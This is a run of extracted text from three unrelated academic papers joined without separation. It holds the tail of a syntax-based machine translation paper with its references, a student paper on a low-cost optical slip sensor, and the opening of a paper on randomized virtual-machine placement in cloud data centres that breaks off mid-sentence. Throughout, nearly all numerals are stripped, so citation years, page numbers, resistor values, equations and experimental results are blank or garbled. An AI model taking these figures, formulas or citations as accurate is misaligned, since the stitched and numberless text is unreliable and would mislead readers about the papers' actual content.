like bleu and n-gram models are natu- ral counterparts. the approach we present is language- independent, and we evaluated it on smt into german and russian. while we have no empirical data on the model’s effectiveness for other target languages, we suspect that syntactic n-grams are especially suited for modelling and evaluating translations into languages with inter-dependencies between distant words and relatively free word order, such as german, czech, or russian. in this work, we relied on parse hypotheses being provided by a string-to-tree smt decoder, but other settings are conceivable for future work, such as per- forming n-best string reranking by coupling the rela- tional dependency lm with a monolingual parse al- gorithm. another obvious extension of the relational dependency lm is the inclusion of more context, for instance through larger windows for siblings and an- cestors, or source-context as in (devlin et al., ). also, we believe that the model can benefit from further advances in neural network modelling, for instance recent findings that ensembles of networks outperform a single network (mikolov et al., ; devlin et al., ) acknowledgements i thank bonnie webber and the anonymous review- ers for their helpful suggestions and feedback. this research was funded by the swiss national science foundation under grant p zhp _ . references satanjeev banerjee and alon lavie. . meteor: an automatic metric for mt evaluation with im- proved correlation with human judgments. in pro- ceedings of the acl workshop on intrinsic and ex- trinsic evaluation measures for machine transla- tion and/or summarization, pages – , ann arbor, michigan. association for computational linguistics. yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. j. mach. learn. res., : – , march. ondrej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint- amand, radu soricut, lucia specia, and aleš tam- chyna. . findings of the workshop on sta- tistical machine translation. in proceedings of the ninth workshop on statistical machine translation, pages – , baltimore, maryland, usa. association for computational linguistics. chris callison-burch, philipp koehn, christof monz, and omar zaidan. . findings of the work- shop on statistical machine translation. in proceed- ings of the sixth workshop on statistical machine translation, pages – , edinburgh, scotland. asso- ciation for computational linguistics. daniel cer, christopher d. manning, and daniel juraf- sky. . the best lexical metric for phrase-based statistical mt system optimization. in human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, hlt ’ , pages – , los angeles, california. association for computa- tional linguistics. eugene charniak, kevin knight, and kenji yamada. . syntax-based language models for statistical machine translation. in mt summit ix, new orleans, usa. eugene charniak. . immediate-head parsing for language models. in proceedings of the th annual meeting on association for computational linguis- tics, acl ’ , pages – . association for com- putational linguistics. ciprian chelba and frederick jelinek. . structured language modeling. computer speech & language, ( ): – . ciprian chelba, david engle, frederick jelinek, vic- tor jimenez, sanjeev khudanpur, lidia mangu, harry printz, eric ristad, ronald rosenfeld, andreas stol- cke, and dekai wu. . structure and performance of a dependency language model. in proceedings of eurospeech, pages – . colin cherry and george foster. . batch tuning strategies for statistical machine translation. in pro- ceedings of the conference of the north amer- ican chapter of the association for computational linguistics: human language technologies, naacl hlt ’ , pages – , montreal, canada. associa- tion for computational linguistics. jonathan h. clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statistical machine translation: controlling for optimizer insta- bility. in proceedings of the th annual meeting of the association for computational linguistics, pages – , portland, oregon. association for computa- tional linguistics. michael collins. . head-driven statistical mod- els for natural language parsing. computational lin- guistics, : – . michael denkowski and alon lavie. . meteor . : automatic metric for reliable optimization and evaluation of machine translation systems. in pro- ceedings of the sixth workshop on statistical machine translation, pages – , edinburgh, scotland. asso- ciation for computational linguistics. jacob devlin, rabih zbib, zhongqiang huang, thomas lamar, richard schwartz, and john makhoul. . fast and robust neural network joint models for sta- tistical machine translation. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, maryland. association for computational linguistics. julia hockenmaier and mark steedman. . gen- erative models for statistical parsing with combina- tory categorial grammar. in proceedings of the th annual meeting of the association for computational linguistics, pages – , philadelphia, pa, usa. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in pro- ceedings of the acl- demo and poster sessions, pages – , prague, czech republic. association for computational linguistics. phong le and willem zuidema. . the inside- outside recursive neural network model for depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar. associa- tion for computational linguistics. ding liu and daniel gildea. . syntactic features for evaluation of machine translation. in proceed- ings of the acl workshop on intrinsic and extrinsic evaluation measures for machine translation and/or summarization, pages – , ann arbor, michigan. chang liu, daniel dahlmeier, and hwee tou ng. . better evaluation metrics lead to better machine translation. in proceedings of the conference on empirical methods in natural language process- ing, pages – , edinburgh, uk. chi-kiu lo, meriem beloucif, and dekai wu. . im- proving machine translation into chinese by tuning against chinese meant. in th international work- shop on spoken language translation (iwslt ), heidelberg, germany. david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in pro- ceedings of the main conference on human language technology conference of the north american chap- ter of the association of computational linguistics, hlt-naacl ’ , pages – , new york. asso- ciation for computational linguistics. tomas mikolov, stefan kombrink, lukas burget, jan cernocký, and sanjeev khudanpur. . exten- sions of recurrent neural network language model. in proceedings of the ieee international conference on acoustics, speech, and signal processing, icassp , pages – , prague, czech republic. joakim nivre, johan hall, and jens nilsson. . malt- parser: a data-driven parser-generator for depen- dency parsing. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – , genoa, italy. franz josef och, daniel gildea, sanjeev khudanpur, anoop sarkar, kenji yamada, alex fraser, shankar kumar, libin shen, david smith, katherine eng, viren jain, zhen jin, and dragomir radev. . a smorgasbord of features for statistical machine translation. in proceedings of the main conference on human language technology conference of the north american chapter of the association of com- putational linguistics, pages – , boston, mas- sachusetts, usa. association for computational lin- guistics. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of the th annual meeting on association for compu- tational linguistics, pages – , philadelphia, pa. association for computational linguistics. jan-thorsten peter, matthias huck, hermann ney, and daniel stein. . soft string-to-dependency hierarchical machine translation. in informatik- tage der gesellschaft für informatik, lecture notes in informatics (lni), pages – , bonn, germany. gesellschaft für informatik. martin popel and david marecek. . perplexity of n-gram and dependency language models. in petr sojka, ales horák, ivan kopecek, and karel pala, edi- tors, tsd, volume of lecture notes in computer science, pages – . springer. matt post and daniel gildea. . parsers as language models for statistical machine translation. in proceed- ings of the eighth conference of the association for machine translation in the americas. chris quirk, arul menezes, and colin cherry. . dependency tree translation: syntactically informed phrasal smt. technical report msr-tr- - , microsoft research. rudolf rosa, david mareček, and ondřej dušek. . depfix: a system for automatic correction of czech mt outputs. in proceedings of the seventh workshop on statistical machine translation, wmt ’ , pages – , montreal, canada. association for computational linguistics. rico sennrich, martin volk, and gerold schneider. . exploiting synergies between open resources for german dependency parsing, pos-tagging, and mor- phological analysis. in proceedings of the interna- tional conference recent advances in natural lan- guage processing , pages – , hissar, bul- garia. rico sennrich. . a cyk+ variant for scfg decod- ing without a dot chart. in proceedings of ssst- , eighth workshop on syntax, semantics and structure in statistical translation, pages – , doha, qatar, october. association for computational linguistics. serge sharoff and joakim nivre. . the proper place of men and machines in language technology. process- ing russian without any linguistic knowledge. in pro- ceedings of the international conference on compu- tational linguistics and artificial intelligence dialog . libin shen, jinxi xu, and ralph weischedel. . string-to-dependency statistical machine translation. comput. linguist., ( ): – . grigori sidorov, francisco velasquez, efstathios sta- matatos, alexander gelbukh, and liliana chanona- hernández. . syntactic dependency-based n- grams as classification features. in proceedings of the th mexican international conference on ad- vances in computational intelligence - volume part ii, micai’ , pages – , berlin, heidelberg. springer- verlag. matthew snover, bonnie dorr, richard schwartz, lin- nea micciulla, and john makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of association for machine translation in the americas, pages – . richard socher, christopher d. manning, and andrew y. ng. . learning continuous phrase represen- tations and syntactic parsing with recursive neural networks. proceedings of the deep learning and un- supervised feature learning workshop of nips , pages – . andreas stolcke. . srilm – an extensible lan- guage modeling toolkit. in seventh international conference on spoken language processing, pages – , denver, colorado, usa. kristina toutanova, hisami suzuki, and achim ruopp. . applying morphology generation models to machine translation. in proceedings of the th an- nual meeting of the association for computational linguistics. reut tsarfaty, khalil sima’an, and remko scha. . an alternative to head-driven approaches for pars- ing a (relatively) free word-order language. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , singapore. reut tsarfaty. . relational-realizational parsing. ph.d. thesis, university of amsterdam. ashish vaswani, yinggong zhao, victoria fossum, and david chiang. . decoding with large-scale neural language models improves translation. in proceedings of the conference on empirical methods in natural language processing, emnlp , pages – , seattle, washington, usa. marion weller, alexander fraser, and sabine schulte im walde. . using subcategorization knowledge to improve case prediction for translation to german. in proceedings of the st annual meeting of the associ- ation for computational linguistics, pages – , sofia, bulgaria. association for computational lin- guistics. philip williams and philipp koehn. . agreement constraints for statistical machine translation into german. in proceedings of the sixth workshop on statistical machine translation, pages – , ed- inburgh, uk. association for computational linguis- tics. philip williams, rico sennrich, maria nadejde, matthias huck, eva hasler, and philipp koehn. . ed- inburgh’s syntax-based systems at wmt . in proceedings of the ninth workshop on statistical ma- chine translation, pages – , baltimore, mary- land, usa. association for computational linguis- tics. joy ying zhang. . structured language models for statistical machine translation. ph.d. thesis, johns hopkins university. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - cheap and simple slip sensor based on the optical sensor feibi liu university of southampton, southampton, uk, so bj e-mail: @qq.com abstract—the purpose of this project is to manufacture a cheap and simple slip sensor. the slip sensor is based on the optical sensor. the experiment divides into two parts, how to build sensor and how to test the features of the sensor. the slip sensor could be divided into three parts, cover, optical sensor and adaptor board, which will connect to the suitable resistors circuit to obtain the large gain. during the test, the participant applies the static state way to measure the relationship between input and output with a white cover and a gray cover. the slip sensor with the white cover has low hysteresis and high repeatability which are better than the gray cover. keywords-slip sensor; optical sensor; force sensor; static state; reflective object sensor i. introduction when humans try to grasp an object, they do not need to know the parameters (like mass) of the object. they just control the force of the hand which ensures the object will not fall by human ‘feeling’. for the robot hand, the slip sensors which fix on the fingertips could give the feedback (it is like human’s feeling) to the cpu which could control the force of the robot hand [ ]. in a sense, the slip sensor is a kind of the force sensor, because the feedback of the slip sensor is related to the force which puts on the surface of slip sensor. only different is the slip sensor focuses on the force changing between the object slipping and not slipping. there are many kinds of methods to build a slip sensor or a force sensor, which bases different theories. at the beginning, luo used piezoresistive strain gauge on the robot links to detect the force and this was used in this field for a long time. however, this structure was a little complex comparing the new ways [ ]. cristina cristalli and michael r neuman designed a kind of force sensor by changing the capacitance in dielectric structure[ ].they used this sensor to measure the blood pressure and gain a good ratio between the input and output. however, in the experiment, they also found that the ratio between the input and output would change a little when they used the same way to build a same standard sensor. the reason is the different stray capacitances in the environment. piezoresistive is very popular in industry and research field because of low cost, small and light-weight. however, piezoresistive exists low repeatability and large hysteresis, which will cause the low accuracy. l.paredes-madrid group improved the accuracy of piezoresistive by modeling the capacitance. nevertheless, they still needed to consider how to reduce the force estimation errors [ ]. lorenzo jamone and his group designed a kind of tactile sensor that based on the hall-effect theory. this sensor detected the changing of the magnetic field when the force pushed on the sensor to give a feedback to control. after the experiment, they found this kind of sensor had high sensitivity, low hysteresis, and good repeatability, but the experiment just tested the force on normal component [ ]. samir boukhenous and mokhtar attari also used the hall-effect theory to produce a pinch grip sensor, which had a good response to input and output. however, the experiment also focused on the normal direction [ ]. darko belavic and his group completed an experiment about the low energy consumption of different types of pressure sensors which included the piezoelectric sensor. this piezoelectric sensor was based on the performances of the ferroelectric thick films, which could transform the pressure into shifted resonant frequency of diaphragm which could be regarded as an output signal. they concluded that the piezoelectric resonant sensor was suitable for low energy consumption and the energy consumption was mainly international journal of advanced network, monitoring and controls volume , no. , dependent on materials and structures, but it was not sample work to reduce consumption because of complete relationships between every component in sensor [ ]. shouhei shirafuji and koh hosoda developed a robot hand which combined the strain gauge sensor and piezoelectric polyvingylidenefluoride (pvdf) sensor to measure stresses and detect slipping. the pvdf sensor could detect the variations of the force which was caused by the slipping of the object. however, the pvdf sensor needed the high reactive ability and high resolution to detect the slipping [ ]. a. persichetti, f. vecchi and m. c. carrozza, presented a contact sensor using optical theory, which based on detecting the changes of the light beams intensity. figure showed the structure of this kind of sensor, which included a soft silicone cover, a receiver (a phototransistor) and a transmitter (an infrared photodiode). when the force pressured on the cover, the intensity of the light which reflects the receiver will change. therefore, this sensor has high sensitivity, fast response and could enhance the immunity to noise by adjusting the light intensity from the transmitter [ ]. figure . the structure of the optical sensor for this paper, the participant will utilize the optical theory to build a cheap, simple and low consumption slip sensor. because the photodiode needs to emit high intensity light, the optical sensor will cost high consumption compared with other sensors [ ]. therefore, the participant tried to find a good material which could reduce the loss during reflecting, which could reduce the requirement of the light intensity which is emitted by the photodiode. this could reduce the consumption. for obtaining a good response, the participant also chooses suitable resistors to get large amplifier gain. comparing with an optical sensor which is built by a. persichetti and his friends [ ], the most different in this paper is the participant use cast perspex acrylic sheet to replace silicone (showing figure ) as the cover. because the cast perspex acrylic sheet is harder than silicone, this replacement could increase the robustness of the sensor. however, this also means the slip sensor may sacrifice some sensitivity. ii. methodology the purpose of the experiment is to produce a cheap, simple and low consumption slip sensor. therefore, the experiment could be divided into two parts, the first part is to build the slip sensor and the second part is to test the slip sensor as figure . figure . the slip sensor with resistors a. design the slip sensor includes three parts, cover, optical sensor and adapter board. figure shows the slip sensor. therefore, first step, the participant needs to choose a suitable optical sensor. international journal of advanced network, monitoring and controls volume , no. , figure . the slip sensor the qre rg-minature reflective object sensor is used as the optical sensor because it is mini. as figure showing, the photodiode (transmitter) which is between the pin and pin emits the light and the phototransistor (receiver) which will receive the reflected light from the cover is fixed between pin and pin [ ]. figure . the structure of the qre rg sensor second step, the participant needs to produce a suitable cover. the cover is made by the mm thickness clear cast perspex acrylic sheet. there are some advantages to using this material. firstly, the weight is light. secondly, the cost of the material is low. thirdly, it is easy to build which just needs a laser cutter. fourthly, the cast perspex acrylic sheet has high tensile strength and rigidity, so it could protect the optical sensor which is under the cover. fifthly, the clear perspex acrylic could transmit % of the visible light, which is simple to the participant to change the color of the cover and detect the influence of the color of the cover [ ]. figure shows the blueprint of the cover. figure shows the cover after gluing. figure . the cover's blueprint figure . cover third step, solder the optical sensor on the adapter board as the figure . international journal of advanced network, monitoring and controls volume , no. , figure . the optical sensor with adaptor figure . the circuit's schematic structure fourth step, choose the suitable resistors to build the circuit. figure shows the equivalent circuit diagram. rf is used to keep the photodiode (transmitter) working in the ideal voltage range. rc is to amplify the voltage signal. according to the specification of the qre rg, the participant assumes if = . a, which could ensure the photodiode work well at room temperature. figure . forward current vs forward voltage from figure , the forward voltage (vf ) should be about . v. according equation ,rf= Ω.  because the participant wants to get the largest reflection light from the cover, the participant puts a white thin paper on the top of the cover during the test. the distance between the top surface of the cover and the top surface of the optical sensor is about mm. according to the figure , it could easy find that the real collector current ic is . which is half of collector current at distance mm. figure . normalized collector current vs distance between when if = . a and distance is mm, the collector current is around . ma in according specification, so the real collector current ic is . ma. assume the collector-emitter voltage (vce) is . v which could get international journal of advanced network, monitoring and controls volume , no. , larger gain. using the equation gets the collector resistor (rc= Ω).  b. test these devices were applied in the experiment. el r power supply ( v and . a);amprobe xr-a multimeter; compression testing machine;mdo b- mixed domain oscilloscope;hmc digital multimeter. figure shows the schematic during testing. figure . the assembly schematic first step, the participant put a white paper on the cover to detect the relationship between the force and voltage. because the output voltage was more than v which is exceed the range of the amprobe xr-a multimeter, the second power supply gave v reverse voltage as the offset voltage. second step, the participant put a weight ( n) on compression testing machine and recorded the voltage. third step, repeated step until there were six weights ( n) on the machine. fourth step, took the weight ( n) one by one from the machine and recorded the voltage after each operation. after these steps, one group of data was completed. to obtain stable data, the participant repeated five times of these steps and got five groups of data. next, the participant changed the color of the cover into gray, which just put nothing between the probe and cover, because the probe is in gray. then, used the same way to get five groups of data. the output voltage is not more than v, so the offset voltage does not need. the second power supply is v. iii. result and analyses figure and figure , show the relationship between the output voltage and force using white cover. the trend line in each figure could quantize the relationship between the output and input. the r-square shows on each figure mean the reliability of the trend line. when the value is more near the , the points should more near the trend line. usually, when the value is larger than . , the trend line could predict the relationship between the input and output. in each of figure and figure , the r-square is larger than . , which means the trend line has high predictability. from these two figures, it is easy to find that the coefficients of these two trend lines are close. therefore, the sensor has low hysteresis and high repeatability in white color. the offset voltage is around . v, which is a little high. the reason is that the white color reflects almost light which enhances the power that phototransistor received. figure . meaning of voltage vs force when force is increasing international journal of advanced network, monitoring and controls volume , no. , figure . meaning of voltage vs force when force is reducing figure and figure show the relationship between the output voltage and force using gray cover. however, it is easy to find that the r-square in these two figures is much lower than figure and figure . the reason is that the features of the optical sensor between collector current and distance getting from the specification are based on the white paper. all assumes are also based on that condition, using white paper ( % reflective). therefore, the accuracy of the trend line is low during using gray cover. however, the gain using gray cover (around . ) is two times than the gain using white cover (around . ). the participant speculates one of group data in figure and is not reliable. from the figure and figure , the max output points are much higher than average output points, because one group of the value is much higher than others. this may be caused by hysteresis. nevertheless, to ensure the authenticity of the experiment. the participant still recorded this group of value. figure . meaning of voltage vs force when force is increasing figure . meaning of voltage vs force when force is reducing iv. conclusions during the experiment, the participant used a cheap and simple way to build a slip sensor. the participant also found that white cover of the sensor has high repeatability, low hysteresis, and high predictability. however, the gray cover of the sensor has low repeatability and low accuracy. comparing with other slip sensors which use the optical theory, this slip sensor has high robustness. in the test, the participant used static state way to test the feature of the slip sensor, which could obtain the quantized function information between input and output. however, in the future work, the participant could improve the experiment from these two aspects. first one, the participant should try to detect the response of slip sensor in the dynamic state which means the object is slipping on the sensor. second one, the participant should design a black box to control the external light. this could help the participant understand the influence of the light in the environment to the sensor cover and find a high resistance of cover to the external light. references [ ] paul h chappell, darryl p j cotton, andy cranny and neil m white “experimental lead zirconate titanate (pzt) slip sensor”, mec ' measuring success in upper limb prosthetics, aug. [ ] r. luo, “a microcomputer-based intelligent sensor for multiaxis force/torque measurement”, in ieee transactions on industrial electronics, vol. pp. - . february . [ ] c. cristalli and m. r. neuman, “a capacitive pressure sensor for measurement of interfacial pressure between a sphygmomanometer cuff and the arm," engineering in medicine and biology society, international journal of advanced network, monitoring and controls volume , no. , ., ieee th annual conference, montreal, que., , pp. - vol. . [ ] l. paredes-madrid, l. emmi and p. gonzalez de santos, "improving the performance of piezoresistive force sensors by modeling sensor capacitance," ieee international symposium on industrial electronics, bari, , pp. - .doi: . /isie. . [ ] l. jamone, l. natale, g. metta and g. sandini, "highly sensitive soft tactile sensors for an anthropomorphic robotic hand," in ieee sensors journal, vol. , no. , pp. - , aug. . doi: . /jsen. . [ ] s. boukhenous and m. attari, "an easy made pinch grip sensor to quantify fingertip pressure," nd international conference on signals, circuits and systems, monastir, , pp. - . doi: . /icscs. . [ ] d. belavic et al., “low energy consumption thick-_lm pressure sensors," microelectronics and packaging conference, . empc .european, rimini, , pp. - . [ ] s. shirafuji and k. hosoda, “detection and prevention of slip using sensors with different properties embedded in elastic artificial skin on the basis of previous experience," advanced robotics (icar), th international conference on, tallinn, , pp. - . [ ] a. persichetti, f. vecchi and m. c. carrozza, “optoelectronic based flexible contact sensor for prosthetic hand application," ieee th international conference on rehabilitation robotics, noordwijk, , pp. - . [ ] p. h. chappell, “making sense of artificial hands,” journal of medical engineering technology, , vol. [ ] “qre pdf datasheet reflective object sensor”, fairchildsemi.com, . <https://www.fairchildsemi.com/products/optoelectronics/infrared/ref lective-sensors/qre .html?keyword=qre gr.> ( -sep- ). [ ] “perspex design guide - guidance for fabricators and designers. - perspex", perspex.co.uk. <http://www.perspex.co.uk/technical-library/brochures-and-workboo ks/perspex-design-guide/> ( - sep- ). randomized routing of virtual machines in iaas data centers randomized routing of virtual machines in iaas data centers hadi khani and hamed khanmirza department of engineering, islamic azad university garmsar branch, garmsar, semnan, iran department of computer engineering, k. n. toosi university of technology, tehran, tehran, iran abstract cloud computing technology has been a game changer in recent years. cloud computing providers promise cost-effective and on-demand resource computing for their users. cloud computing providers are running the workloads of users as virtual machines (vms) in a large-scale data center consisting a few thousands physical servers. cloud data centers face highly dynamic workloads varying over time and many short tasks that demand quick resource management decisions. these data centers are large scale and the behavior of workload is unpredictable. the incoming vm must be assigned onto the proper physical machine (pm) in order to keep a balance between power consumption and quality of service. the scale and agility of cloud computing data centers are unprecedented so the previous approaches are fruitless. we suggest an analytical model for cloud computing data centers when the number of pms in the data center is large. in particular, we focus on the assignment of vm onto pms regardless of their current load. for exponential vm arrival with general distribution sojourn time, the mean power consumption is calculated. then, we show the minimum power consumption under quality of service constraint will be achieved with randomize assignment of incoming vms onto pms. extensive simulation supports the validity of our analytical model. subjects computer networks and communications, optimization theory and computation keywords optimization, cloud computing, placement, energy consumption, service level agreement, virtualization introduction infrastructure-as-a-service (iaas) cloud providers (cps), such as amazon, google and microsoft, have huge data centers to provide on demand virtual machines (vms) to their customers. an important issue for such data centers is to determine the server to which an incoming vm should be placed in order to optimize a given performance criterion. the cp has a variety of challenges, such as higher resource utilization, less cooling expenses and lower operation expenses. fortunately, all of these efficiency metrics are positively correlated. less power consumption means less operational expense, less cooling bills and higher utilization in the data center. this lets us choose the power consumption as the key metric representing others. on the other hand, cloud users who run their applications on vms have their own concerns with quality of service. the resource management of cp has the chance to revise the initial placement of vms onto pms by live migrating techniques or dynamic consolidation. considering live migration, the problem of vm placement can be divided in two parts as pictured in fig. . how to cite this article khani h, khanmirza h. . randomized routing of virtual machines in iaas data centers. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted july published september corresponding author hadi khani, hkhani@ut.ac.ir academic editor lan wang additional information and declarations can be found on page doi . /peerj-cs. copyright khani and khanmirza distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:hkhani@�ut.�ac.�ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ . the routing of arriving vms onto pms . the optimization of the current vm placement by vm migration according to this scenario, a vm request transmitted by a user to the data center is routed to the proper pm in the first step and then its placement can be optimized later. the optimization of the current vm placement in the data center is analogous to the np-hard “bin packing problem.” in this problem, a given set of items of variable size should assigned to the minimum number of bins taken from a given set. the vms experience dynamic workloads, which means that the resource usage by a vm arbitrarily varies over time. in fact, the data center resource manager does not have the complete knowledge of the future resource usage (size) of vms. the placement of vms is monitored continuously and is tuned through the migration procedure. the virtualization technology let vm migrates (moves) between pms on the fly. the migration of vm can be advantageous either when the resources utilization is too low, meaning that the pm is highly underutilized, or when it is too high, possibly causing overload situations and service level agreement violations (slavs). the optimization problem of vm placement problem is so complex that centralized and deterministic solutions are practically useless in large data centers with hundreds or thousands of servers as shown in several researches like (wang & gelenbe, ; shojafar, cordeschi & baccarelli, ; wang, jiang & wu, ). the centralized and deterministic algorithms may be appropriate in data centers with a limited number of servers, but may become inefficient in large and router vms pm pm pm pm|p| ... vm migra�on vm migra�on vm migra�on λ =r λ λ =r λ λ =r λ λ|p|=r|p|λ λ cloud data center figure randomized router. full-size doi: . /peerj-cs. /fig- khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ very large data centers, due to the complexity of the problem and the need for the simultaneous migrations of a large number of vms. these decentralized approaches have some side effect on routing procedure in the first part. the router does not have complete knowledge of the current placement of cloud data center. it is noteworthy that the router neither does not know about the size, the exact arriving time and sojourn time of the future vms. these facts justify the stochastic modeling and analyzing of the router performance. in this paper, we focus on the first problem: the problem of routing arriving vm to the host. we calculate probability of slav as well as total power consumption in a cloud data center using tools of queueing theory. a cloud data center differs from traditional queueing systems. first, a cloud data can have a large number of pms; traditional queueing analysis rarely consider system of this size. second, vm sojourn time must be modeled by general distribution instead of convenient exponential distribution. these differences pose significant challenges to the analysis. we use a novel approach to respond to these challenges. our contributions in this paper are: . we model the cloud data centers as a group of m/g/n/n queuing systems with single task arrivals and a task buffer of finite capacity; . we define a novel optimization problem to minimize the power consumption under an explicit qos goal for any vm consolidation system; . we find the optimal routing policy using numerical methods. analytical results are validated through discrete event simulation. then, we compare our result with some benchmark algorithm for google workload. the remainder of the paper is organized as follows. the “related work” section gives an overview of existing work on cloud performance evaluation and performance characterization of m/g/n/n + r queuing systems. it also introduces some heuristic algorithms for vm consolidation that we use for comparison. in the “system model” section we discuss our analytical model in detail. we solve our optimization problem in order to obtain desired performance metrics in the “optimization problem” section. in the “simulation results” section, we present and discuss analytical as well as simulation results. we conclude the paper with the section “conclusion” discussing the results and future research directions. related work prior approaches to vm placement in the literature can be broadly divided into two categories: rigorous analytical approach and heuristic algorithms. one of the first works on analysis of performance issues in vm placement has been performed by yang et al. ( ). they obtained the distribution of response time for a cloud data center modeled as an m/m/n/n + r queueing system. they assumed both interarrival and service times are exponentially distributed, and the system has finite buffer of size n + r. the response time was broken down into waiting, service and execution periods, assuming that all three periods are independent, which is unrealistic. khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by relaxing the assumption that the service times are not exponential, one can construct an accurate and close-to-reality model at the expense of greater complexity in the analysis. most theoretical analyses have relied on extensive research in performance evaluation of m/g/n queuing systems (ma & mark, ; miyazawa, ; yao, ). however, the probability distributions of response time and queue length in m/g/n and m/g/n/n + r cannot be obtained in closed form, which necessitates the search for a suitable approximation. an approximate solution for steady-state queue length distribution in an m/g/n system with finite waiting space is described in kimura ( ). the proposed approach is exact for m/g/n/n + r when r = . a similar approach for m/g/m queues is proposed in kimura ( ). in this work, analysis is extended to compute the blocking probability and, thus, determines the smallest buffer capacity such that the rate of lost tasks remains below a predefined level. in nozaki & ross ( ), another approximation for the average queuing delay in an m/g/n/n + r queue was proposed. the approximation is based on the relationship of joint distribution of remaining service time to the equilibrium service distribution. another approximation for the blocking probability is based on the exact solution for finite capacity m/m/n/n + r queues (smith, ). again, the estimate of the blocking probability is used to guide the allocation of buffers so that the blocking probability remains below a specific threshold. most of above findings rely on some approximations. approximations are reasonably accurate only when the number of servers is comparatively small, typically below or so. in addition, approximation errors are high when the traffic intensity is small as stated in boxma, cohen & huffels ( ), kimura ( ), and tijms, van hoorn & federgruen ( ). as a result, we cannot apply the above results directly for performance analysis of cp data center when one or more of the following holds: the number of servers is very large or the distribution of service times is unknown and does not follow any of the “well-behaved” probability distributions such as exponential distribution. as we use the m/g/n/n queueing system to model a physical machine (pm) and not the whole data center, our analysis is suitable for performance analysis of cloud scale data centers. in addition, we study m/g/n/n in steady station setting. kimura ( ) has proposed an exact closed form for queue length distribution in an m/g/n/n. in this paper, we use this closed form in defining optimization problem (kimura, ) which let us apply numerical computation for analyzing the performance of the whole data center in next step. in order to compare the performance of randomized router in practice, we have chosen two algorithms from heuristic algorithms as benchmark: power aware best fit decreasing (pabfd) (beloglazov & buyya, ) and modified throttled (mt) (domanal & reddy, ). as mentioned before, the vm placement can be seen as a bin packing problem with variable bin sizes and prices, where bins represent the pms; items are the vms that have to be allocated; bin sizes are the available cpu capacities of the pms; and prices correspond to the power consumption by the nodes. as the bin packing problem is np-hard, to solve it beloglazov & buyya ( ) apply a modification of the best fit decreasing algorithm khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that is shown to use no more than opt þ bins (where opt is the number of bins provided by the optimal solution) (yue, ). in pabfd, they sort all the vms in the decreasing order of their current cpu utilizations and allocate each vm to a host that provides the least increase of the power consumption caused by the allocation. in each round of pabfd all vms are placed again. the number of vm migrations skyrockets in pabfd and it is not practical in a real large-scale data center. modified throttled algorithm maintains an index table of pms and also the state of pms (domanal & reddy, ). there has been an attempt made to improve the response time and achieve efficient usage of available pms. proposed algorithm employs a method for selecting a machine for hosting arriving vm of user where, machine at first index is initially selected depending upon the state of the machine. if the machine is available, it is assigned with the request and id of machine is returned to data center resource manager, else - is returned. when the next request arrives, the machine at the index next to already assigned machine is chosen depending on the state of machine and follows the above step. this method needs to keep an updated index table of state of machines. in large data centers this task is not trivial, in particular when you taking into account the decentralized consolidation of vms. it is important that both mt and pabfd is not practical in real scenario, and here we use them just as idealistic benchmark algorithms. system model consider a iaas data center consisting of a set of |p| pms. let p = { , ,...,|p|} denote index set of the set of pms. users request vms to the provider. new request is either admitted or rejected in the admission control phase. an admitted request moves to the placement phase, where it will be assigned to one of pms (carvalho, menasce & brasileiro, ). we suggest a randomized router after the admission. the router sends incoming vms to pm i with probability ri, for all i ∈ p. the vector~r ¼ fr ; r ; . . . ; rjpjg is a probability vector and satisfies p i p ri ¼ . vms have independent and identically distributed service (sojourn) time with mean /m. in addition, these sojourn times are independent of the host load. assume that the utilization demand of all vms is equal to one. extensive analysis of huge data centers shows that majority of the vms have approximately the same utilization (reiss, wilkes & hellerstein, ). this observation supports our assumption. assume that each pm only hosts at most n vms. in the case a vm is assigned to an already full pm, the pm is overloaded. an overloaded pm degrades the qos of the end user and we can assume this event as an slav (domanal & reddy, ; beloglazov & buyya, ). it should be remembered that the router is after admission control and admitted vms could not be queued. all vms arrive at the data center according to poisson process with rate l, thereby vms arrive at pm i according to poisson process with rate li = l ri, for all i ∈ p (wang, chang & liu, ). these processes are independent (see section . in trivedi ( )). the whole data center can be modeled as a group of independent m/g/n/n (also known as generalized erlang loss system) systems that work in parallel. khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generalized erlang loss system it is well known that for an m/g/n/n system, the steady-state distribution exists and is given by the “product form” as below (kelly, ; kimura, ). pk ¼ p � l � �k k! ; for k � n ; for k > n < : ( ) where pk denotes the steady-state probability that there are k vms in an m/g/n/n system, that is pk ¼ limt! pkðtÞ, and the steady-state probability that m/g/n/n is empty (p ) is given by p ¼ xn k¼ � m � �k k! " #� ( ) specifically, pn describes the fraction of time that the pm is fully utilized. we call this probability slav and it is given by pn ¼ ð�=mÞn n!xn k¼ ð�=mÞk k! ( ) power consumption we are interested in minimizing the total 